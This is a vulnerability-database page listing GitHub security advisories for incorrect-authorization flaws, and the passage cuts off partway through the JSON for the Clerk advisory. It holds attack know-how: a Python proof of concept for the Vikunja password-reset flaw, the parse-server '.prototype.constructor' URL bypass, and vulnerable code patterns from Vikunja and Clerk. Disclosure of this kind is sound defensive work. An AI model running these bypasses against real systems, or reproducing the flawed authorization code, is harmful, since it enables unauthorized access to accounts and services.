CWE-863
Allowed-with-ReviewIncorrect Authorization
Abstraction: Class · Status: Incomplete
The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
5544 vulnerabilities reference this CWE, most recent first.
GHSA-VPH4-5MF4-28V5
Vulnerability from github – Published: 2022-05-24 17:40 – Updated: 2025-10-22 00:32The vulnerability have been reported to affect earlier versions of QTS. If exploited, this improper access control vulnerability could allow attackers to obtain control of a QNAP device. This issue affects: QNAP Systems Inc. Helpdesk versions prior to 3.0.3.
{
"affected": [],
"aliases": [
"CVE-2020-2506"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-02-03T16:15:00Z",
"severity": "CRITICAL"
},
"details": "The vulnerability have been reported to affect earlier versions of QTS. If exploited, this improper access control vulnerability could allow attackers to obtain control of a QNAP device. This issue affects: QNAP Systems Inc. Helpdesk versions prior to 3.0.3.",
"id": "GHSA-vph4-5mf4-28v5",
"modified": "2025-10-22T00:32:02Z",
"published": "2022-05-24T17:40:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-2506"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-2506"
},
{
"type": "WEB",
"url": "https://www.qnap.com/zh-tw/security-advisory/qsa-20-08"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VPH4-QFCH-W6X9
Vulnerability from github – Published: 2022-08-11 00:00 – Updated: 2025-10-20 18:30The SystemUI module has a privilege escalation vulnerability. Successful exploitation of this vulnerability can cause malicious applications to pop up windows or run in the background.
{
"affected": [],
"aliases": [
"CVE-2022-37002"
],
"database_specific": {
"cwe_ids": [
"CWE-269",
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-10T20:16:00Z",
"severity": "CRITICAL"
},
"details": "The SystemUI module has a privilege escalation vulnerability. Successful exploitation of this vulnerability can cause malicious applications to pop up windows or run in the background.",
"id": "GHSA-vph4-qfch-w6x9",
"modified": "2025-10-20T18:30:29Z",
"published": "2022-08-11T00:00:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37002"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2022/8"
},
{
"type": "WEB",
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-phones-202208-0000001363876177"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VPJ2-QQ7W-5QQ6
Vulnerability from github – Published: 2026-03-31 23:48 – Updated: 2026-03-31 23:48Impact
An attacker can bypass Cloud Function validator access controls by appending .prototype.constructor to the function name in the URL. When a Cloud Function handler is declared using the function keyword and its validator is a plain object or arrow function, the trigger store traversal resolves the handler through its own prototype chain while the validator store fails to mirror this traversal, causing all access control enforcement to be skipped.
This allows unauthenticated callers to invoke Cloud Functions that are meant to be protected by validators such as requireUser, requireMaster, or custom validation logic.
Patches
The trigger store traversal now verifies that each intermediate node is a legitimate store object before continuing traversal. If the traversal encounters a non-store value such as a function handler, it stops and returns an empty store, preventing prototype chain escape.
Workarounds
Use arrow functions instead of the function keyword for Cloud Function handlers. Arrow functions do not have a prototype property and are not affected by this vulnerability.
Resources
- GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-vpj2-qq7w-5qq6
- Fix Parse Server 9: https://github.com/parse-community/parse-server/pull/10342
- Fix Parse Server 8: https://github.com/parse-community/parse-server/pull/10343
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.7.0-alpha.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.6.67"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34532"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-31T23:48:38Z",
"nvd_published_at": "2026-03-31T15:16:20Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nAn attacker can bypass Cloud Function validator access controls by appending `.prototype.constructor` to the function name in the URL. When a Cloud Function handler is declared using the `function` keyword and its validator is a plain object or arrow function, the trigger store traversal resolves the handler through its own prototype chain while the validator store fails to mirror this traversal, causing all access control enforcement to be skipped.\n\nThis allows unauthenticated callers to invoke Cloud Functions that are meant to be protected by validators such as `requireUser`, `requireMaster`, or custom validation logic.\n\n### Patches\n\nThe trigger store traversal now verifies that each intermediate node is a legitimate store object before continuing traversal. If the traversal encounters a non-store value such as a function handler, it stops and returns an empty store, preventing prototype chain escape.\n\n### Workarounds\n\nUse arrow functions instead of the `function` keyword for Cloud Function handlers. Arrow functions do not have a `prototype` property and are not affected by this vulnerability.\n\n### Resources\n\n- GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-vpj2-qq7w-5qq6\n- Fix Parse Server 9: https://github.com/parse-community/parse-server/pull/10342\n- Fix Parse Server 8: https://github.com/parse-community/parse-server/pull/10343",
"id": "GHSA-vpj2-qq7w-5qq6",
"modified": "2026-03-31T23:48:38Z",
"published": "2026-03-31T23:48:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-vpj2-qq7w-5qq6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34532"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/10342"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/10343"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/commit/4fc48cf28f22eea200d74d883505f485234a48d7"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/commit/dc59e272665644083c5b7f6862d88ce1ef0b2674"
},
{
"type": "PACKAGE",
"url": "https://github.com/parse-community/parse-server"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "parse-server has cloud function validator bypass via prototype chain traversal"
}
GHSA-VQ3H-P7J6-HWJW
Vulnerability from github – Published: 2023-04-28 12:30 – Updated: 2024-04-04 03:43This vulnerability exists in Milesight 4K/H.265 Series NVR models (MS-Nxxxx-xxG, MS-Nxxxx-xxE, MS-Nxxxx-xxT, MS-Nxxxx-xxH and MS-Nxxxx-xxC), due to improper authorization at the Milesight NVR web-based management interface. A remote attacker could exploit this vulnerability by sending a specially crafted http requests on the targeted device.
Successful exploitation of this vulnerability could allow remote attacker to perform unauthorized activities on the targeted device.
{
"affected": [],
"aliases": [
"CVE-2023-30467"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-04-28T11:15:09Z",
"severity": "CRITICAL"
},
"details": "This vulnerability exists in Milesight 4K/H.265 Series NVR models (MS-Nxxxx-xxG, MS-Nxxxx-xxE, MS-Nxxxx-xxT, MS-Nxxxx-xxH and MS-Nxxxx-xxC), due to improper authorization at the Milesight NVR web-based management interface. A remote attacker could exploit this vulnerability by sending a specially crafted http requests on the targeted device.\n\nSuccessful exploitation of this vulnerability could allow remote attacker to perform unauthorized activities on the targeted device.\n\n\n\n\n\n\n\n\n\n\n",
"id": "GHSA-vq3h-p7j6-hwjw",
"modified": "2024-04-04T03:43:26Z",
"published": "2023-04-28T12:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30467"
},
{
"type": "WEB",
"url": "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01\u0026VLCODE=CIVN-2023-0121"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VQ3R-VCHR-9X6P
Vulnerability from github – Published: 2025-07-30 00:32 – Updated: 2025-11-03 21:34An authorization issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.6. A local attacker may gain access to Keychain items.
{
"affected": [],
"aliases": [
"CVE-2025-43251"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-30T00:15:36Z",
"severity": "MODERATE"
},
"details": "An authorization issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.6. A local attacker may gain access to Keychain items.",
"id": "GHSA-vq3r-vchr-9x6p",
"modified": "2025-11-03T21:34:16Z",
"published": "2025-07-30T00:32:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43251"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/124149"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2025/Jul/32"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VQ4Q-79HH-Q767
Vulnerability from github – Published: 2026-03-20 17:25 – Updated: 2026-03-25 20:53Summary
A flaw in Vikunja’s password reset logic allows disabled users to regain access to their accounts. The ResetPassword() function sets the user’s status to StatusActive after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through /api/v1/user/password/token and completing the reset via /api/v1/user/password/reset, a disabled user can reactivate their account and bypass administrator-imposed account disablement.
Vulnerable Code Snippet
In pkg/user/user_password_reset.go, beginning at line 66:
// Hash the password
user.Password, err = HashPassword(reset.NewPassword)
if err != nil {
return
}
err = removeTokens(s, user, TokenPasswordReset)
if err != nil {
return
}
user.Status = StatusActive // <--- VULNERABILITY: Unconditionally sets status to Active
_, err = s.
Cols("password", "status").
Where("id = ?", user.ID).
Update(user)
if err != nil {
return
}
The code is vulnerable because it assumes that any user resetting their password is transitioning from a normal state or an "Email Confirmation Required" state into an "Active" state. It completely ignores whether the user was placed in the StatusDisabled state by an administrator.
Additionally, in the token request function (RequestUserPasswordResetTokenByEmail), the system fetches the user via GetUserWithEmail() which does not filter out disabled users, allowing them to legally request the token in the first place.
PoC (Proof of Concept)
Manual Exploitation Steps
- Create a standard user account in Vikunja.
- As an Administrator (or by modifying the database directly), disable the user account by setting their status to Disabled (
status = 2). - Attempt to log in as the disabled user to verify access is blocked (receives
HTTP 412: This account is disabled). - Without authenticating, send a
POSTrequest to/api/v1/user/password/tokenwith the disabled user's email address. - Retrieve the password reset token from the incoming email.
- Send a
POSTrequest to/api/v1/user/password/resetwith the token and a new password. - Log in using the new password. Observe that the login succeeds (
HTTP 200) and the account has been maliciously reactivated.
Automation PoC
import requests
import psycopg2
import time
import secrets
API_URL = "http://localhost:3456/api/v1"
def main():
username = f"testuser_{secrets.token_hex(4)}"
email = f"{username}@example.com"
password = "SuperSecretPassword123!"
print("[1] Registering user...")
requests.post(f"{API_URL}/register", json={"username": username, "email": email, "password": password})
print("[2] Admin disables account (Status = 2)...")
conn = psycopg2.connect(host="localhost", database="vikunja", user="vikunja", password="vikunja_password")
cursor = conn.cursor()
cursor.execute("UPDATE users SET status = 2 WHERE username = %s;", (username,))
conn.commit()
print("[3] Verifying login is blocked...")
res = requests.post(f"{API_URL}/login", json={"username": username, "password": password})
print(f"Login response: {res.status_code} (Should be 412)")
print("[4] Attacker requests password reset...")
requests.post(f"{API_URL}/user/password/token", json={"email": email})
print("[5] Attacker grabs token from email/DB...")
cursor.execute("SELECT id FROM users WHERE username = %s;", (username,))
user_id = cursor.fetchone()[0]
cursor.execute("SELECT token FROM user_tokens WHERE user_id = %s AND kind = 1 ORDER BY created DESC LIMIT 1;", (user_id,))
token = cursor.fetchone()[0]
print("[6] Attacker submits reset, triggering bug...")
new_password = "HackedPassword123!"
requests.post(f"{API_URL}/user/password/reset", json={"token": token, "new_password": new_password})
print("[7] Attacker logs in successfully!")
res = requests.post(f"{API_URL}/login", json={"username": username, "password": new_password})
print(f"Final Login response: {res.status_code} (Should be 200)")
cursor.execute("SELECT status FROM users WHERE username = %s;", (username,))
print(f"Final DB Status: {cursor.fetchone()[0]} (0 = Active)")
conn.close()
if __name__ == "__main__":
main()
Impact
- Authentication & Authorization Bypass: An attacker can unilaterally reverse an administrative security decision.
- Integrity & Confidentiality Impact: The attacker can regain full access to resources and functionality that were previously restricted due to the account being disabled.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "code.vikunja.io/api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33316"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-862",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-20T17:25:47Z",
"nvd_published_at": "2026-03-24T15:16:35Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA flaw in Vikunja\u2019s password reset logic allows disabled users to regain access to their accounts. The `ResetPassword()` function sets the user\u2019s status to `StatusActive` after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through `/api/v1/user/password/token` and completing the reset via `/api/v1/user/password/reset`, a disabled user can reactivate their account and bypass administrator-imposed account disablement.\n\n#### Vulnerable Code Snippet\n\nIn `pkg/user/user_password_reset.go`, beginning at line 66:\n\n```go\n\t// Hash the password\n\tuser.Password, err = HashPassword(reset.NewPassword)\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = removeTokens(s, user, TokenPasswordReset)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tuser.Status = StatusActive // \u003c--- VULNERABILITY: Unconditionally sets status to Active\n\t_, err = s.\n\t\tCols(\"password\", \"status\").\n\t\tWhere(\"id = ?\", user.ID).\n\t\tUpdate(user)\n\tif err != nil {\n\t\treturn\n\t}\n```\n\nThe code is vulnerable because it assumes that any user resetting their password is transitioning from a normal state or an \"Email Confirmation Required\" state into an \"Active\" state. It completely ignores whether the user was placed in the `StatusDisabled` state by an administrator.\nAdditionally, in the token request function (`RequestUserPasswordResetTokenByEmail`), the system fetches the user via `GetUserWithEmail()` which does **not** filter out disabled users, allowing them to legally request the token in the first place.\n\n### PoC (Proof of Concept)\n\n#### Manual Exploitation Steps\n\n1. Create a standard user account in Vikunja.\n2. As an Administrator (or by modifying the database directly), disable the user account by setting their status to Disabled (`status = 2`).\n3. Attempt to log in as the disabled user to verify access is blocked (receives `HTTP 412: This account is disabled`).\n4. Without authenticating, send a `POST` request to `/api/v1/user/password/token` with the disabled user\u0027s email address.\n5. Retrieve the password reset token from the incoming email.\n6. Send a `POST` request to `/api/v1/user/password/reset` with the token and a new password.\n7. Log in using the new password. Observe that the login succeeds (`HTTP 200`) and the account has been maliciously reactivated.\n\n#### Automation PoC\n\n```python\nimport requests\nimport psycopg2\nimport time\nimport secrets\n\nAPI_URL = \"http://localhost:3456/api/v1\"\n\ndef main():\n username = f\"testuser_{secrets.token_hex(4)}\"\n email = f\"{username}@example.com\"\n password = \"SuperSecretPassword123!\"\n \n print(\"[1] Registering user...\")\n requests.post(f\"{API_URL}/register\", json={\"username\": username, \"email\": email, \"password\": password})\n \n print(\"[2] Admin disables account (Status = 2)...\")\n conn = psycopg2.connect(host=\"localhost\", database=\"vikunja\", user=\"vikunja\", password=\"vikunja_password\")\n cursor = conn.cursor()\n cursor.execute(\"UPDATE users SET status = 2 WHERE username = %s;\", (username,))\n conn.commit()\n \n print(\"[3] Verifying login is blocked...\")\n res = requests.post(f\"{API_URL}/login\", json={\"username\": username, \"password\": password})\n print(f\"Login response: {res.status_code} (Should be 412)\")\n \n print(\"[4] Attacker requests password reset...\")\n requests.post(f\"{API_URL}/user/password/token\", json={\"email\": email})\n \n print(\"[5] Attacker grabs token from email/DB...\")\n cursor.execute(\"SELECT id FROM users WHERE username = %s;\", (username,))\n user_id = cursor.fetchone()[0]\n cursor.execute(\"SELECT token FROM user_tokens WHERE user_id = %s AND kind = 1 ORDER BY created DESC LIMIT 1;\", (user_id,))\n token = cursor.fetchone()[0]\n \n print(\"[6] Attacker submits reset, triggering bug...\")\n new_password = \"HackedPassword123!\"\n requests.post(f\"{API_URL}/user/password/reset\", json={\"token\": token, \"new_password\": new_password})\n \n print(\"[7] Attacker logs in successfully!\")\n res = requests.post(f\"{API_URL}/login\", json={\"username\": username, \"password\": new_password})\n print(f\"Final Login response: {res.status_code} (Should be 200)\")\n\n cursor.execute(\"SELECT status FROM users WHERE username = %s;\", (username,))\n print(f\"Final DB Status: {cursor.fetchone()[0]} (0 = Active)\")\n conn.close()\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Impact\n\n* **Authentication \u0026 Authorization Bypass:** An attacker can unilaterally reverse an administrative security decision.\n* **Integrity \u0026 Confidentiality Impact:** The attacker can regain full access to resources and functionality that were previously restricted due to the account being disabled.",
"id": "GHSA-vq4q-79hh-q767",
"modified": "2026-03-25T20:53:32Z",
"published": "2026-03-20T17:25:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-vq4q-79hh-q767"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33316"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/commit/049f4a6be46f9460bd516f489ef9f569574bc70d"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/commit/d8570c603da1f26635ce6048d6af85ede827abfb"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-vikunja/vikunja"
},
{
"type": "WEB",
"url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Vikunja\u2019s Improper Access Control Enables Bypass of Administrator-Imposed Account Disablement "
}
GHSA-VQ56-WJH5-MWQF
Vulnerability from github – Published: 2022-05-24 19:20 – Updated: 2022-07-13 00:01IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 212782.
{
"affected": [],
"aliases": [
"CVE-2021-38977"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-11-15T16:15:00Z",
"severity": "MODERATE"
},
"details": "IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 212782.",
"id": "GHSA-vq56-wjh5-mwqf",
"modified": "2022-07-13T00:01:36Z",
"published": "2022-05-24T19:20:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38977"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212782"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/6516052"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VQG7-8V6X-54RQ
Vulnerability from github – Published: 2022-05-24 17:24 – Updated: 2024-01-11 17:43Magento versions 2.3.5-p1 and earlier, and 2.3.5-p1 and earlier have a security mitigation bypass vulnerability. Successful exploitation could lead to arbitrary code execution.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "magento/community-edition"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.5-p2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-9692"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-11T17:43:59Z",
"nvd_published_at": "2020-07-29T13:15:00Z",
"severity": "MODERATE"
},
"details": "Magento versions 2.3.5-p1 and earlier, and 2.3.5-p1 and earlier have a security mitigation bypass vulnerability. Successful exploitation could lead to arbitrary code execution.",
"id": "GHSA-vqg7-8v6x-54rq",
"modified": "2024-01-11T17:43:59Z",
"published": "2022-05-24T17:24:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9692"
},
{
"type": "WEB",
"url": "https://github.com/magento/magento2/commit/9436781734e47c83e96977fa770d255217680d5e"
},
{
"type": "PACKAGE",
"url": "https://github.com/magento/magento2"
},
{
"type": "WEB",
"url": "https://helpx.adobe.com/security/products/magento/apsb20-47.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Magento security mitigation bypass vulnerability"
}
GHSA-VQJC-H5M3-4Q6J
Vulnerability from github – Published: 2022-02-19 00:01 – Updated: 2023-07-24 15:30MMP: All versions prior to v1.0.3, PTP C-series: Device versions prior to v2.8.6.1, and PTMP C-series and A5x: Device versions prior to v2.5.4.1 does not perform proper authorization and authentication checks on multiple API routes. An attacker may gain access to these API routes and achieve remote code execution, create a denial-of-service condition, and obtain sensitive information.
{
"affected": [],
"aliases": [
"CVE-2022-21196"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-287",
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-02-18T18:15:00Z",
"severity": "CRITICAL"
},
"details": "MMP: All versions prior to v1.0.3, PTP C-series: Device versions prior to v2.8.6.1, and PTMP C-series and A5x: Device versions prior to v2.5.4.1 does not perform proper authorization and authentication checks on multiple API routes. An attacker may gain access to these API routes and achieve remote code execution, create a denial-of-service condition, and obtain sensitive information.",
"id": "GHSA-vqjc-h5m3-4q6j",
"modified": "2023-07-24T15:30:19Z",
"published": "2022-02-19T00:01:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21196"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-034-02"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VQX2-FGX2-5WQ9
Vulnerability from github – Published: 2026-04-16 21:28 – Updated: 2026-04-27 16:08Summary
createRouteMatcher in @clerk/nextjs, @clerk/nuxt, and @clerk/astro can be bypassed by certain crafted requests, allowing them to skip middleware gating and reach downstream handlers.
Sessions are not compromised and no existing user can be impersonated - the bypass only affects the middleware-level gating decision.
Who is affected
All apps using createRouteMatcher should upgrade to the patched versions. Patches are drop-in with no API changes. The information below describes the scope of the bypass and helps you understand whether you are potentially affected, but is not a reason to delay the upgrade.
Apps relying only on middleware gating via createRouteMatcher are affected, because a crafted request can skip middleware checks and reach downstream handlers (API routes, server components, etc.). This middleware pattern permits the bypass:
// Next.js example, equivalent patterns exist in Nuxt and Astro
const isProtectedRoute = createRouteMatcher(['/admin(.*)']);
export default clerkMiddleware(async (auth, req) => {
if (isProtectedRoute(req)) {
await auth.protect();
}
});
That said, the bypass is limited to the middleware-level route-matching gate. clerkMiddleware still authenticates the request and auth() reflects the real authentication state of the caller. Auth checks performed inside your route handlers, server components, or server actions continue to work correctly and are not affected. Whether your app is affected in practice depends on whether you have those downstream checks.
External APIs that authenticate each request with a token are also unaffected on those endpoints, since token verification runs independently.
Additionally, this common middleware pattern correctly blocks the bypass at the middleware layer:
// Next.js example, equivalent patterns exist in Nuxt and Astro
const isPublicRoute = createRouteMatcher(['/docs(.*)']);
export default clerkMiddleware(async (auth, req) => {
if (!isPublicRoute(req)) {
await auth.protect();
}
});
@clerk/shared is usually not imported directly in application code, but if you import createPathMatcher from an affected @clerk/shared version, you are also affected. Run npm why @clerk/shared (or your package manager's equivalent) to check your installed version.
Recommended actions
Install the patched version for your framework (pick the one matching your current major):
@clerk/nextjs
- v7.x: fixed in 7.2.1
- v6.x: fixed in 6.39.2
- v5.x: fixed in 5.7.6
@clerk/nuxt
- v2.x: fixed in 2.2.2
- v1.x: fixed in 1.13.28
@clerk/astro
- v3.x: fixed in 3.0.15
- v2.x: fixed in 2.17.10
- v1.x: fixed in 1.5.7
@clerk/shared
- v4.x: fixed in 4.8.1
- v3.x: fixed in 3.47.4
- v2.x: fixed in 2.22.1
Workaround
If you cannot upgrade immediately, adding server-side auth checks (auth()) inside your route handlers, server components, or server actions provides defense-in-depth against this bypass.
Timeline
This issue was reported on 13 APR 2026, patched on 15 APR 2026, and publicly disclosed on 15 APR 2026.
Thanks to Christiaan Swiers for the responsible disclosure of this vulnerability.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@clerk/nextjs"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.7.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@clerk/nuxt"
},
"ranges": [
{
"events": [
{
"introduced": "1.1.0"
},
{
"fixed": "1.13.28"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@clerk/astro"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.1"
},
{
"fixed": "1.5.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@clerk/shared"
},
"ranges": [
{
"events": [
{
"introduced": "2.20.17"
},
{
"fixed": "2.22.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@clerk/nextjs"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0-snapshot.vb87a27f"
},
{
"fixed": "6.39.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@clerk/nextjs"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.2.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@clerk/nuxt"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.2.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.17.9"
},
"package": {
"ecosystem": "npm",
"name": "@clerk/astro"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0-snapshot.v20241206174604"
},
{
"fixed": "2.17.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@clerk/astro"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.15"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@clerk/shared"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0-canary.v20250225091530"
},
{
"fixed": "3.47.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@clerk/shared"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.8.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41248"
],
"database_specific": {
"cwe_ids": [
"CWE-436",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-16T21:28:26Z",
"nvd_published_at": "2026-04-24T21:16:18Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\n`createRouteMatcher` in `@clerk/nextjs`, `@clerk/nuxt`, and `@clerk/astro` can be bypassed by certain crafted requests, allowing them to skip middleware gating and reach downstream handlers.\n\nSessions are not compromised and no existing user can be impersonated - the bypass only affects the middleware-level gating decision.\n\n## Who is affected\n\nAll apps using `createRouteMatcher` should upgrade to the patched versions. Patches are drop-in with no API changes. The information below describes the scope of the bypass and helps you understand whether you are potentially affected, but is not a reason to delay the upgrade.\n\nApps relying only on middleware gating via `createRouteMatcher` are affected, because a crafted request can skip middleware checks and reach downstream handlers (API routes, server components, etc.). This middleware pattern permits the bypass:\n\n```ts\n// Next.js example, equivalent patterns exist in Nuxt and Astro\nconst isProtectedRoute = createRouteMatcher([\u0027/admin(.*)\u0027]);\n\nexport default clerkMiddleware(async (auth, req) =\u003e {\n if (isProtectedRoute(req)) {\n await auth.protect();\n }\n});\n```\n\nThat said, the bypass is limited to the middleware-level route-matching gate. `clerkMiddleware` still authenticates the request and `auth()` reflects the real authentication state of the caller. Auth checks performed inside your route handlers, server components, or server actions continue to work correctly and are not affected. Whether your app is affected in practice depends on whether you have those downstream checks.\n\nExternal APIs that authenticate each request with a token are also unaffected on those endpoints, since token verification runs independently.\n\nAdditionally, this common middleware pattern correctly blocks the bypass at the middleware layer:\n\n```ts\n// Next.js example, equivalent patterns exist in Nuxt and Astro\nconst isPublicRoute = 